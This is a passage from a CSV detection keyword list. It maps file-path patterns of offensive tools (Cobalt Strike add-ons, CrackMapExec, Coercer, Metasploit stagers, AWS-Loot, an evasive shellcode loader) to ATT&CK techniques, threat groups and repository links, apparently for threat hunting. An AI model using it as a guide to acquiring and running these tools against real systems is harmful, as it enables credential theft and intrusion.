T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipboardinject/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipmon/clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/clipmon/dll/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*/CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*/clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cloud_enum.git*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloud_enum.txt*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloudbrute.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/cloudsploit.git*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*/clown-newuser.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/cmd/c2.go*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*/cmd/hades/*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*/cmd_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/cmd_log.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/cmd_stager*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/cmdstager/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cme_adcs_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cme_shares_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cme_spooler_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/CMSeek*","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Web Attacks","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","10","2062","497","2023-07-03T12:17:20Z","2018-06-14T00:15:51Z" +"*/Cn33liz*","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cna/pipetest.cna*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*/Cneelis*","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank.Passionate about networking and cybersecurity. known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://twitter.com/Cneelis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/co2-cewler/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/co2-core/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/co2-laudanum/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/co2-sqlmapper/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/coap-resources.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cobaltclip.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*/cobaltclip.o*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*/Cobalt-Clip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*/cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/cobalt-strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/cobaltstrike/c2lint*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*/CodeBuildLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*/coercer.egg-info*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer.git*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer/*.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/coercer_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/CoffeeLdr.c*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*/CoffeeLdr/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 